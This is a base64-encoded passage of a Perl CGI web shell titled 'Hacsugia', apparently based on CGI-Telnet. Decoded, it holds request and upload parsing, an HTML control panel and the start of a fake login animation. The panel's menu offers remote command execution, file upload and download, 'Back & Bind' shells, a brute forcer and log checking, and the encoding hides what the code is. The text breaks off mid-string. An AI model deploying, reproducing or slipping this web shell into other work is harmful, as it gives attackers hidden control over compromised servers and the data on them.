IEJFTE9XIFRISVMgTElORSBVTkxFU1MgWU9VIEtOT1cgV0hBVCBZT1UnUkUgRE9JTkcgISEKCiRDbWRTZXAgPSAoJFdpbk5UID8gJE5UQ21kU2VwIDogJFVuaXhDbWRTZXApOwokQ21kUHdkID0gKCRXaW5OVCA/ICJjZCIgOiAicHdkIik7CiRQYXRoU2VwID0gKCRXaW5OVCA/ICJcXCIgOiAiLyIpOwokUmVkaXJlY3RvciA9ICgkV2luTlQgPyAiIDI+JjEgMT4mMiIgOiAiIDE+JjEgMj4mMSIpOwokY29scz0gMTUwOwokcm93cz0gMjY7CiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBSZWFkcyB0aGUgaW5wdXQgc2VudCBieSB0aGUgYnJvd3NlciBhbmQgcGFyc2VzIHRoZSBpbnB1dCB2YXJpYWJsZXMuIEl0CiMgcGFyc2VzIEdFVCwgUE9TVCBhbmQgbXVsdGlwYXJ0L2Zvcm0tZGF0YSB0aGF0IGlzIHVzZWQgZm9yIHVwbG9hZGluZyBmaWxlcy4KIyBUaGUgZmlsZW5hbWUgaXMgc3RvcmVkIGluICRpbnsnZid9IGFuZCB0aGUgZGF0YSBpcyBzdG9yZWQgaW4gJGlueydmaWxlZGF0YSd9LgojIE90aGVyIHZhcmlhYmxlcyBjYW4gYmUgYWNjZXNzZWQgdXNpbmcgJGlueyd2YXInfSwgd2hlcmUgdmFyIGlzIHRoZSBuYW1lIG9mCiMgdGhlIHZhcmlhYmxlLiBOb3RlOiBNb3N0IG9mIHRoZSBjb2RlIGluIHRoaXMgZnVuY3Rpb24gaXMgdGFrZW4gZnJvbSBvdGhlciBDR0kKIyBzY3JpcHRzLgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBSZWFkUGFyc2UgCnsKCWxvY2FsICgqaW4pID0gQF8gaWYgQF87Cglsb2NhbCAoJGksICRsb2MsICRrZXksICR2YWwpOwoJCgkkTXVsdGlwYXJ0Rm9ybURhdGEgPSAkRU5WeydDT05URU5UX1RZUEUnfSA9fiAvbXVsdGlwYXJ0XC9mb3JtLWRhdGE7IGJvdW5kYXJ5PSguKykkLzsKCglpZigkRU5WeydSRVFVRVNUX01FVEhPRCd9IGVxICJHRVQiKQoJewoJCSRpbiA9ICRFTlZ7J1FVRVJZX1NUUklORyd9OwoJfQoJZWxzaWYoJEVOVnsnUkVRVUVTVF9NRVRIT0QnfSBlcSAiUE9TVCIpCgl7CgkJYmlubW9kZShTVERJTikgaWYgJE11bHRpcGFydEZvcm1EYXRhICYgJFdpbk5UOwoJCXJlYWQoU1RESU4sICRpbiwgJEVOVnsnQ09OVEVOVF9MRU5HVEgnfSk7Cgl9CgoJIyBoYW5kbGUgZmlsZSB1cGxvYWQgZGF0YQoJaWYoJEVOVnsnQ09OVEVOVF9UWVBFJ30gPX4gL211bHRpcGFydFwvZm9ybS1kYXRhOyBib3VuZGFyeT0oLispJC8pCgl7CgkJJEJvdW5kYXJ5ID0gJy0tJy4kMTsgIyBwbGVhc2UgcmVmZXIgdG8gUkZDMTg2NyAKCQlAbGlzdCA9IHNwbGl0KC8kQm91bmRhcnkvLCAkaW4pOyAKCQkkSGVhZGVyQm9keSA9ICRsaXN0WzFdOwoJCSRIZWFkZXJCb2R5ID1+IC9cclxuXHJcbnxcblxuLzsKCQkkSGVhZGVyID0gJGA7CgkJJEJvZHkgPSAkJzsKIAkJJEJvZHkgPX4gcy9cclxuJC8vOyAjIHRoZSBsYXN0IFxyXG4gd2FzIHB1dCBpbiBieSBOZXRzY2FwZQoJCSRpbnsnZmlsZWRhdGEnfSA9ICRCb2R5OwoJCSRIZWFkZXIgPX4gL2ZpbGVuYW1lPVwiKC4rKVwiLzsgCgkJJGlueydmJ30gPSAkMTsgCgkJJGlueydmJ30gPX4gcy9cIi8vZzsKCQkkaW57J2YnfSA9fiBzL1xzLy9nOwoKCQkjIHBhcnNlIHRyYWlsZXIKCQlmb3IoJGk9MjsgJGxpc3RbJGldOyAkaSsrKQoJCXsgCgkJCSRsaXN0WyRpXSA9fiBzL14uK25hbWU9JC8vOwoJCQkkbGlzdFskaV0gPX4gL1wiKFx3KylcIi87CgkJCSRrZXkgPSAkMTsKCQkJJHZhbCA9ICQnOwoJCQkkdmFsID1+IHMvKF4oXHJcblxyXG58XG5cbikpfChcclxuJHxcbiQpLy9nOwoJCQkkdmFsID1+IHMvJSguLikvcGFjaygiYyIsIGhleCgkMSkpL2dlOwoJCQkkaW57JGtleX0gPSAkdmFsOyAKCQl9Cgl9CgllbHNlICMgc3RhbmRhcmQgcG9zdCBkYXRhICh1cmwgZW5jb2RlZCwgbm90IG11bHRpcGFydCkKCXsKCQlAaW4gPSBzcGxpdCgvJi8sICRpbik7CgkJZm9yZWFjaCAkaSAoMCAuLiAkI2luKQoJCXsKCQkJJGluWyRpXSA9fiBzL1wrLyAvZzsKCQkJKCRrZXksICR2YWwpID0gc3BsaXQoLz0vLCAkaW5bJGldLCAyKTsKCQkJJGtleSA9fiBzLyUoLi4pL3BhY2soImMiLCBoZXgoJDEpKS9nZTsKCQkJJHZhbCA9fiBzLyUoLi4pL3BhY2soImMiLCBoZXgoJDEpKS9nZTsKCQkJJGlueyRrZXl9IC49ICJcMCIgaWYgKGRlZmluZWQoJGlueyRrZXl9KSk7CgkJCSRpbnska2V5fSAuPSAkdmFsOwoJCX0KCX0KfQoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFByaW50cyB0aGUgSFRNTCBQYWdlIEhlYWRlcgojIEFyZ3VtZW50IDE6IEZvcm0gaXRlbSBuYW1lIHRvIHdoaWNoIGZvY3VzIHNob3VsZCBiZSBzZXQKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgUHJpbnRQYWdlSGVhZGVyCnsKCSRFbmNvZGVkQ3VycmVudERpciA9ICRDdXJyZW50RGlyOwoJJEVuY29kZWRDdXJyZW50RGlyID1+IHMvKFteYS16QS1aMC05XSkvJyUnLnVucGFjaygiSCoiLCQxKS9lZzsKCW15ICRkaXIgPSRDdXJyZW50RGlyOwoJJGRpcj1+IHMvXFwvXFxcXC9nOwoJcHJpbnQgIkNvbnRlbnQtdHlwZTogdGV4dC9odG1sXG5cbiI7CglwcmludCA8PEVORDsKPGh0bWw+CjxoZWFkPgo8bWV0YSBodHRwLWVxdWl2PSJjb250ZW50LXR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD1VVEYtOCI+Cjx0aXRsZT5IYWNzdWdpYTwvdGl0bGU+CgokSHRtbE1ldGFIZWFkZXIKCjwvaGVhZD4KPHN0eWxlPgpib2R5ewpmb250OiAxMHB0IFZlcmRhbmE7Cn0KdHIgewpCT1JERVItUklHSFQ6ICAjM2UzZTNlIDFweCBzb2xpZDsKQk9SREVSLVRPUDogICAgIzNlM2UzZSAxcHggc29saWQ7CkJPUkRFUi1MRUZUOiAgICMzZTNlM2UgMXB4IHNvbGlkOwpCT1JERVItQk9UVE9NOiAjM2UzZTNlIDFweCBzb2xpZDsKY29sb3I6ICNmZjk5MDA7Cn0KdGQgewpCT1JERVItUklHSFQ6ICAjM2UzZTNlIDFweCBzb2xpZDsKQk9SREVSLVRPUDogICAgIzNlM2UzZSAxcHggc29saWQ7CkJPUkRFUi1MRUZUOiAgICMzZTNlM2UgMXB4IHNvbGlkOwpCT1JERVItQk9UVE9NOiAjM2UzZTNlIDFweCBzb2xpZDsKY29sb3I6ICMyQkE4RUM7CmZvbnQ6IDEwcHQgVmVyZGFuYTsKfQoKdGFibGUgewpCT1JERVItUklHSFQ6ICAjM2UzZTNlIDFweCBzb2xpZDsKQk9SREVSLVRPUDogICAgIzNlM2UzZSAxcHggc29saWQ7CkJPUkRFUi1MRUZUOiAgICMzZTNlM2UgMXB4IHNvbGlkOwpCT1JERVItQk9UVE9NOiAjM2UzZTNlIDFweCBzb2xpZDsKQkFDS0dST1VORC1DT0xPUjogIzExMTsKfQoKCmlucHV0IHsKQk9SREVSLVJJR0hUOiAgIzNlM2UzZSAxcHggc29saWQ7CkJPUkRFUi1UT1A6ICAgICMzZTNlM2UgMXB4IHNvbGlkOwpCT1JERVItTEVGVDogICAjM2UzZTNlIDFweCBzb2xpZDsKQk9SREVSLUJPVFRPTTogIzNlM2UzZSAxcHggc29saWQ7CkJBQ0tHUk9VTkQtQ09MT1I6IEJsYWNrOwpmb250OiAxMHB0IFZlcmRhbmE7CmNvbG9yOiAjZmY5OTAwOwp9CgppbnB1dC5zdWJtaXQgewp0ZXh0LXNoYWRvdzogMHB0IDBwdCAwLjNlbSBjeWFuLCAwcHQgMHB0IDAuM2VtIGN5YW47CmNvbG9yOiAjRkZGRkZGOwpib3JkZXItY29sb3I6ICMwMDk5MDA7Cn0KCmNvZGUgewpib3JkZXIJCQk6IGRhc2hlZCAwcHggIzMzMzsKQkFDS0dST1VORC1DT0xPUjogQmxhY2s7CmZvbnQ6IDEwcHQgVmVyZGFuYSBib2xkOwpjb2xvcjogd2hpbGU7Cn0KCnJ1biB7CmJvcmRlcgkJCTogZGFzaGVkIDBweCAjMzMzOwpmb250OiAxMHB0IFZlcmRhbmEgYm9sZDsKY29sb3I6ICNGRjAwQUE7Cn0KCnRleHRhcmVhIHsKQk9SREVSLVJJR0hUOiAgIzNlM2UzZSAxcHggc29saWQ7CkJPUkRFUi1UT1A6ICAgICMzZTNlM2UgMXB4IHNvbGlkOwpCT1JERVItTEVGVDogICAjM2UzZTNlIDFweCBzb2xpZDsKQk9SREVSLUJPVFRPTTogIzNlM2UzZSAxcHggc29saWQ7CkJBQ0tHUk9VTkQtQ09MT1I6ICMxYjFiMWI7CmZvbnQ6IEZpeGVkc3lzIGJvbGQ7CmNvbG9yOiAjYWFhOwp9CkE6bGluayB7CglDT0xPUjogIzJCQThFQzsgVEVYVC1ERUNPUkFUSU9OOiBub25lCn0KQTp2aXNpdGVkIHsKCUNPTE9SOiAjMkJBOEVDOyBURVhULURFQ09SQVRJT046IG5vbmUKfQpBOmhvdmVyIHsKCXRleHQtc2hhZG93OiAwcHQgMHB0IDAuM2VtIGN5YW4sIDBwdCAwcHQgMC4zZW0gY3lhbjsKCWNvbG9yOiAjZmY5OTAwOyBURVhULURFQ09SQVRJT046IG5vbmUKfQpBOmFjdGl2ZSB7Cgljb2xvcjogUmVkOyBURVhULURFQ09SQVRJT046IG5vbmUKfQoKLmxpc3RkaXIgdHI6aG92ZXJ7CgliYWNrZ3JvdW5kOiAjNDQ0Owp9Ci5saXN0ZGlyIHRyOmhvdmVyIHRkewoJYmFja2dyb3VuZDogIzQ0NDsKCXRleHQtc2hhZG93OiAwcHQgMHB0IDAuM2VtIGN5YW4sIDBwdCAwcHQgMC4zZW0gY3lhbjsKCWNvbG9yOiAjRkZGRkZGOyBURVhULURFQ09SQVRJT046IG5vbmU7Cn0KLm5vdGxpbmV7CgliYWNrZ3JvdW5kOiAjMTExOwp9Ci5saW5lewoJYmFja2dyb3VuZDogIzIyMjsKfQo8L3N0eWxlPgo8c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0Ij4KZnVuY3Rpb24gY2htb2RfZm9ybShpLGZpbGUpCnsKCS8qdmFyIGFqYXg9J2FqYXhfUG9zdERhdGEoIkZvcm1QZXJtc18nK2krJyIsIiRTY3JpcHRMb2NhdGlvbiIsIlJlc3BvbnNlRGF0YSIpOyByZXR1cm4gZmFsc2U7JzsqLwoJdmFyIGFqYXg9IiI7Cglkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgiRmlsZVBlcm1zXyIraSkuaW5uZXJIVE1MPSI8Zm9ybSBuYW1lPUZvcm1QZXJtc18iICsgaSsgIiBhY3Rpb249JycgbWV0aG9kPSdQT1NUJz48aW5wdXQgaWQ9dGV4dF8iICsgaSArICIgIG5hbWU9Y2htb2QgdHlwZT10ZXh0IHNpemU9NSAvPjxpbnB1dCB0eXBlPXN1Ym1pdCBjbGFzcz0nc3VibWl0JyBvbmNsaWNrPSciICsgYWpheCArICInIHZhbHVlPU9LPjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPWEgdmFsdWU9J2d1aSc+PGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9ZCB2YWx1ZT0nJGRpcic+PGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9ZiB2YWx1ZT0nIitmaWxlKyInPjwvZm9ybT4iOwoJZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoInRleHRfIiArIGkpLmZvY3VzKCk7Cn0KZnVuY3Rpb24gcm1fY2htb2RfZm9ybShyZXNwb25zZSxpLHBlcm1zLGZpbGUpCnsKCXJlc3BvbnNlLmlubmVySFRNTCA9ICI8c3BhbiBvbmNsaWNrPVxcXCJjaG1vZF9mb3JtKCIgKyBpICsgIiwnIisgZmlsZSsgIicpXFxcIiA+IisgcGVybXMgKyI8L3NwYW4+PC90ZD4iOwp9CmZ1bmN0aW9uIHJlbmFtZV9mb3JtKGksZmlsZSxmKQp7Cgl2YXIgYWpheD0iIjsKCWYucmVwbGFjZSgvXFxcXC9nLCJcXFxcXFxcXCIpOwoJdmFyIGJhY2s9InJtX3JlbmFtZV9mb3JtKCIraSsiLFxcXCIiK2ZpbGUrIlxcXCIsXFxcIiIrZisiXFxcIik7IHJldHVybiBmYWxzZTsiOwoJZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoIkZpbGVfIitpKS5pbm5lckhUTUw9Ijxmb3JtIG5hbWU9Rm9ybVBlcm1zXyIgKyBpKyAiIGFjdGlvbj0nJyBtZXRob2Q9J1BPU1QnPjxpbnB1dCBpZD10ZXh0XyIgKyBpICsgIiAgbmFtZT1yZW5hbWUgdHlwZT10ZXh0IHZhbHVlPSAnIitmaWxlKyInIC8+PGlucHV0IHR5cGU9c3VibWl0IGNsYXNzPSdzdWJtaXQnIG9uY2xpY2s9JyIgKyBhamF4ICsgIicgdmFsdWU9T0s+PGlucHV0IHR5cGU9c3VibWl0IGNsYXNzPSdzdWJtaXQnIG9uY2xpY2s9JyIgKyBiYWNrICsgIicgdmFsdWU9Q2FuY2VsPjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPWEgdmFsdWU9J2d1aSc+PGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9ZCB2YWx1ZT0nJGRpcic+PGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9ZiB2YWx1ZT0nIitmaWxlKyInPjwvZm9ybT4iOwoJZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoInRleHRfIiArIGkpLmZvY3VzKCk7Cn0KZnVuY3Rpb24gcm1fcmVuYW1lX2Zvcm0oaSxmaWxlLGYpCnsKCWlmKGY9PSdmJykKCXsKCQlkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgiRmlsZV8iK2kpLmlubmVySFRNTD0iPGEgaHJlZj0nP2E9Y29tbWFuZCZkPSRkaXImYz1lZGl0JTIwIitmaWxlKyIlMjAnPiIgK2ZpbGUrICI8L2E+IjsKCX1lbHNlCgl7CgkJZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoIkZpbGVfIitpKS5pbm5lckhUTUw9IjxhIGhyZWY9Jz9hPWd1aSZkPSIrZisiJz5bICIgK2ZpbGUrICIgXTwvYT4iOwoJfQp9Cjwvc2NyaXB0Pgo8Ym9keSBvbkxvYWQ9ImRvY3VtZW50LmYuQF8uZm9jdXMoKSIgYmdjb2xvcj0iIzBjMGMwYyIgdG9wbWFyZ2luPSIwIiBsZWZ0bWFyZ2luPSIwIiBtYXJnaW53aWR0aD0iMCIgbWFyZ2luaGVpZ2h0PSIwIj4KPGNlbnRlcj48Y29kZT4KPHRhYmxlIGJvcmRlcj0iMSIgd2lkdGg9IjEwMCUiIGNlbGxzcGFjaW5nPSIwIiBjZWxscGFkZGluZz0iMiI+Cjx0cj4KCTx0ZCBhbGlnbj0iY2VudGVyIiByb3dzcGFuPTI+CgkJPGI+PGZvbnQgc2l6ZT0iNSI+JEVkaXRQZXJzaW9uPC9mb250PjwvYj4KCTwvdGQ+CgoJPHRkPgoKCQk8Zm9udCBmYWNlPSJWZXJkYW5hIiBzaXplPSIyIj4kRU5WeyJTRVJWRVJfU09GVFdBUkUifTwvZm9udD4KCTwvdGQ+Cgk8dGQ+U2VydmVyIElQOjxmb250IGNvbG9yPSIjY2MwMDAwIj4gJEVOVnsnU0VSVkVSX0FERFInfTwvZm9udD4gfCBZb3VyIElQOiA8Zm9udCBjb2xvcj0iIzAwMDAwMCI+JEVOVnsnUkVNT1RFX0FERFInfTwvZm9udD4KCTwvdGQ+Cgo8L3RyPgoKPHRyPgo8dGQgY29sc3Bhbj0iMyI+PGZvbnQgZmFjZT0iVmVyZGFuYSIgc2l6ZT0iMiI+CjxhIGhyZWY9IiRTY3JpcHRMb2NhdGlvbiI+SG9tZTwvYT4gfCAKPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9Y29tbWFuZCZkPSRFbmNvZGVkQ3VycmVudERpciI+Q29tbWFuZDwvYT4gfAo8YSBocmVmPSIkU2NyaXB0TG9jYXRpb24/YT1ndWkmZD0kRW5jb2RlZEN1cnJlbnREaXIiPkdVSTwvYT4gfCAKPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9dXBsb2FkJmQ9JEVuY29kZWRDdXJyZW50RGlyIj5VcGxvYWQgRmlsZTwvYT4gfCAKPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9ZG93bmxvYWQmZD0kRW5jb2RlZEN1cnJlbnREaXIiPkRvd25sb2FkIEZpbGU8L2E+IHwKCjxhIGhyZWY9IiRTY3JpcHRMb2NhdGlvbj9hPWJhY2tiaW5kIj5CYWNrICYgQmluZDwvYT4gfAo8YSBocmVmPSIkU2NyaXB0TG9jYXRpb24/YT1icnV0ZWZvcmNlciI+QnJ1dGUgRm9yY2VyPC9hPiB8CjxhIGhyZWY9IiRTY3JpcHRMb2NhdGlvbj9hPWNoZWNrbG9nIj5DaGVjayBMb2c8L2E+IHwKPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9ZG9tYWluc3VzZXIiPkRvbWFpbnMvVXNlcnM8L2E+IHwKPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9bG9nb3V0Ij5Mb2dvdXQ8L2E+IHwKPGEgdGFyZ2V0PSdfYmxhbmsnIGhyZWY9IiMiPkhlbHA8L2E+Cgo8L2ZvbnQ+PC90ZD4KPC90cj4KPC90YWJsZT4KPGZvbnQgaWQ9IlJlc3BvbnNlRGF0YSIgY29sb3I9IiNmZjk5Y2MiID4KRU5ECn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBQcmludHMgdGhlIExvZ2luIFNjcmVlbgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBQcmludExvZ2luU2NyZWVuCnsKCglwcmludCA8PEVORDsKPHByZT48c2NyaXB0IHR5cGU9InRleHQvamF2YXNjcmlwdCI+ClR5cGluZ1RleHQgPSBmdW5jdGlvbihlbGVtZW50LCBpbnRlcnZhbCwgY3Vyc29yLCBmaW5pc2hlZENhbGxiYWNrKSB7CiAgaWYoKHR5cGVvZiBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCA9PSAidW5kZWZpbmVkIikgfHwgKHR5cGVvZiBlbGVtZW50LmlubmVySFRNTCA9PSAidW5kZWZpbmVkIikpIHsKICAgIHRoaXMucnVubmluZyA9IHRydWU7CS8vIE5ldmVyIHJ1bi4KICAgIHJldHVybjsKICB9CiAgdGhpcy5lbGVtZW50ID0gZWxlbWVudDsKICB0aGlzLmZpbmlzaGVkQ2FsbGJhY2sgPSAoZmluaXNoZWRDYWxsYmFjayA/IGZpbmlzaGVkQ2FsbGJhY2sgOiBmdW5jdGlvbigpIHsgcmV0dXJuOyB9KTsKICB0aGlzLmludGVydmFsID0gKHR5cGVvZiBpbnRlcnZhbCA9PSAidW5kZWZpbmVkIiA/IDEwMCA6IGludGVydmFsKTsKICB0aGlzLm9yaWdUZXh0ID0gdGhpcy5lbGVtZW50LmlubmVySFRNTDsKICB0aGlzLnVucGFyc2VkT3JpZ1RleHQgPSB0aGlzLm9yaWdUZXh0OwogIHRoaXMuY3Vyc29yID0gKGN1cnNvciA/IGN1cnNvciA6ICIiKTsKICB0aGlzLmN1cnJlbnRUZXh0ID0gIiI7CiAgdGhpcy5jdXJyZW50Q2hhciA9IDA7CiAgdGhpcy5lbGVtZW50LnR5cGluZ1RleHQgPSB0aGlzOwogIGlmKHRoaXMuZWxlbWVudC5pZCA9PSAiIikgdGhpcy5lbGVtZW50LmlkID0gInR5cGluZ3RleHQiICsgVHlwaW5nVGV4dC5jdXJyZW50SW5kZXgrKzsKICBUeXBpbmdUZXh0LmFsbC5wdXNoKHRoaXMpOwogIHRoaXMucnVubmluZyA9IGZhbHNlOwogIHRoaXMuaW5UYWcgPSBmYWxzZTsKICB0aGlzLnRhZ0J1ZmZlciA9ICIiOwogIHRoaXMuaW5IVE1MRW50aXR5ID0gZmFsc2U7CiAgdGhpcy5IVE1MRW50aXR5QnVmZmVyID0gIiI7Cn0KVHlwaW5nVGV4dC5hbGwgPSBuZXcgQXJyYXkoKTsKVHlwaW5nVGV4dC5jdXJyZW50SW5kZXggPSAwOwpUeXBpbmdUZXh0LnJ1bkFsbCA9IGZ1bmN0aW9uKCkgewogIGZvcih2YXIgaSA9IDA7IGkgPCBUeXBpbmdUZXh0LmFsbC5sZW5ndGg7IGkrKykgVHlwaW5nVGV4dC5hbGxbaV0ucnVuKCk7Cn0KVHlwaW5nVGV4dC5wcm90b3R5cGUucnVuID0gZnVuY3Rpb24oKSB7CiAgaWYodGhpcy5ydW5uaW5nKSByZXR1cm47CiAgaWYodHlwZW9mIHRoaXMub3JpZ1RleHQgPT0gInVuZGVmaW5lZCIpIHsKICAgIHNldFRpbWVvdXQoImRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCciICsgdGhpcy5lbGVtZW50LmlkICsgIicpLnR5cGluZ1RleHQucnVuKCkiLCB0aGlzLmludGVydmFsKTsJLy8gV2UgaGF2ZW4ndCBmaW5pc2hlZCBsb2FkaW5nIHlldC4gIEhhdmUgcGF0aWVuY2UuCiAgICByZXR1cm47CiAgfQogIGlmKHRoaXMuY3VycmVudFRleHQgPT0gIiIpIHRoaXMuZWxlbWVudC5pbm5lckhUTUwgPSAiIjsKLy8gIHRoaXMub3JpZ1RleHQgPSB0aGlzLm9yaWdUZXh0LnJlcGxhY2UoLzwoW148XSkqPi8sICIiKTsgICAgIC8vIFN0cmlwIEhUTUwgZnJvbSB0ZXh0LgogIGlmKHRoaXMuY3VycmVudENoYXIgPCB0aGlzLm9yaWdUZXh0Lmxlbmd0aCkgewogICAgaWYodGhpcy5vcmlnVGV4dC5jaGFyQXQodGhpcy5jdXJyZW50Q2hhcikgPT0gIjwiICYmICF0aGlzLmluVGFnKSB7CiAgICAgIHRoaXMudGFnQnVmZmVyID0gIjwiOwogICAgICB0aGlzLmluVGFnID0gdHJ1ZTsKICAgICAgdGhpcy5jdXJyZW50Q2hhcisrOwogICAgICB0aGlzLnJ1bigpOwogICAgICByZXR1cm47CiAgICB9IGVsc2UgaWYodGhpcy5vcmlnVGV4dC5jaGFyQXQodGhpcy5jdXJyZW50Q2hhcikgPT0gIj4iICYmIHRoaXMuaW5UYWcpIHsKICAgICAgdGhpcy50YWdCdWZmZXIgKz0gIj4iOwogICAgICB0aGlzLmluVGFnID0gZmFsc2U7CiAgICAgIHRoaXMuY3VycmVudFRleHQgKz0gdGhpcy50YWdCdWZmZXI7CiAgICAgIHRoaXMuY3VycmVudENoYXIrKzsKICAgICAgdGhpcy5ydW4oKTsKICAgICAgcmV0dXJuOwogICAgfSBlbHNlIGlmKHRoaXMuaW5UYWcpIHsKICAgICAgdGhpcy50YWdCdWZmZXIgKz0gdGhpcy5vcmlnVGV4dC5jaGFyQXQodGhpcy5jdXJyZW50Q2hhcik7CiAgICAgIHRoaXMuY3VycmVudENoYXIrKzsKICAgICAgdGhpcy5ydW4oKTsKICAgICAgcmV0dXJuOwogICAgfSBlbHNlIGlmKHRoaXMub3JpZ1RleHQuY2hhckF0KHRoaXMuY3VycmVudENoYXIpID09ICImIiAmJiAhdGhpcy5pbkhUTUxFbnRpdHkpIHsKICAgICAgdGhpcy5IVE1MRW50aXR5QnVmZmVyID0gIiYiOwogICAgICB0aGlzLmluSFRNTEVudGl0eSA9IHRydWU7CiAgICAgIHRoaXMuY3VycmVudENoYXIrKzsKICAgICAgdGhpcy5ydW4oKTsKICAgICAgcmV0dXJuOwogICAgfSBlbHNlIGlmKHRoaXMub3JpZ1RleHQuY2hhckF0KHRoaXMuY3VycmVudENoYXIpID09ICI7IiAmJiB0aGlzLmluSFRNTEVudGl0eSkgewogICAgICB0aGlzLkhUTUxFbnRpdHlCdWZmZXIgKz0gIjsiOwogICAgICB0aGlzLmluSFRNTEVudGl0eSA9IGZhbHNlOwogICAgICB0aGlzLmN1cnJlbnRUZXh0ICs9IHRoaXMuSFRNTEVudGl0eUJ1ZmZlcjsKICAgICAgdGhpcy5jdXJyZW50Q2hhcisrOwogICAgICB0aGlzLnJ1bigpOwogICAgICByZXR1cm47CiAgICB9IGVsc2UgaWYodGhpcy5pbkhUTUxFbnRpdHkpIHsKICAgICAgdGhpcy5IVE1MRW50aXR5QnVmZmVyICs9IHRoaXMub3JpZ1RleHQuY2hhckF0KHRoaXMuY3VycmVudENoYXIpOwogICAgICB0aGlzLmN1cnJlbnRDaGFyKys7CiAgICAgIHRoaXMucnVuKCk7CiAgICAgIHJldHVybjsKICAgIH0gZWxzZSB7CiAgICAgIHRoaXMuY3VycmVudFRleHQgKz0gdGhpcy5vcmlnVGV4dC5jaGFyQXQodGhpcy5jdXJyZW50Q2hhcik7CiAgICB9CiAgICB0aGlzLmVsZW1lbnQuaW5uZXJIVE1MID0gdGhpcy5jdXJyZW50VGV4dDsKICAgIHRoaXMuZWxlbWVudC5pbm5lckhUTUwgKz0gKHRoaXMuY3VycmVudENoYXIgPCB0aGlzLm9yaWdUZXh0Lmxlbmd0aCAtIDEgPyAodHlwZW9mIHRoaXMuY3Vyc29yID09ICJmdW5jdGlvbiIgPyB0aGlzLmN1cnNvcih0aGlzLmN1cnJlbnRUZXh0KSA6IHRoaXMuY3Vyc29yKSA6ICIiKTsKICAgIHRoaXMuY3VycmVudENoYXIrKzsKICAgIHNldFRpbWVvdXQoImRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCciICsgdGhpcy5lbGVtZW50LmlkICsgIicpLnR5cGluZ1RleHQucnVuKCkiLCB0aGlzLmludGVydmFsKTsKICB9IGVsc2UgewoJdGhpcy5jdXJyZW50VGV4dCA9ICIiOwoJdGhpcy5jdXJyZW50Q2hhciA9IDA7CiAgICAgICAgdGhpcy5ydW5uaW5nID0gZmFsc2U7CiAgICAgICAgdGhpcy5maW5pc2hlZENhbGxiYWNrKCk7CiAgfQp9Cjwvc2NyaXB0Pgo8L3ByZT4KCjxmb250IHN0eWxlPSJmb250OiAxNXB0IFZlcmRhbmE7IGNvbG9yOiB5ZWxsb3c7Ij5Db3B5cmlnaHQgKEMpIDIwMDEgUm9oaXRhYiBCYXRyYSA8L2ZvbnQ+PGJyPjxicj4KPHRhYmxlIGFsaWduPSJjZW50ZXIiIGJvcmRlcj0iMSIgd2lkdGg9IjYwMCIgaGVpZ2g+Cjx0Ym9keT48dHI+Cjx0ZCB2YWxpZ249InRvcCIgYmFja2dyb3VuZD0iaHR0cDovL2RsLmRyb3Bib3guY29tL3UvMTA4NjAwNTEvaW1hZ2VzL21hdHJhbi5naWYiPjxwIGlkPSJoYWNrIiBzdHlsZT0ibWFyZ2luLWxlZnQ6IDNweDsiPgo8Zm9udCBjb2xvcj0iIzAwOTkwMCI+IFBsZWFzZSBXYWl0IC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC48L2ZvbnQ+IDxicj4KCjxmb250IGNvbG9yPSIjMDA5OTAwIj4gVHJ5aW5nIGNvbm5lY3QgdG8gU2VydmVyIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC48L2ZvbnQ+PGJyPgo8Zm9udCBjb2xvcj0iI0YwMDAwMCI+PGZvbnQgY29sb3I9IiNGRkYwMDAiPn5cJDwvZm9udD4gQ29ubmVjdGVkICEgPC9mb250Pjxicj4KPGZvbnQgY29sb3I9IiMwMDk5MDAiPjxmb250IGNvbG9yPSIjRkZGMDAwIj4kU2VydmVyTmFtZX48L2ZvbnQ+IENoZWNraW5nIFN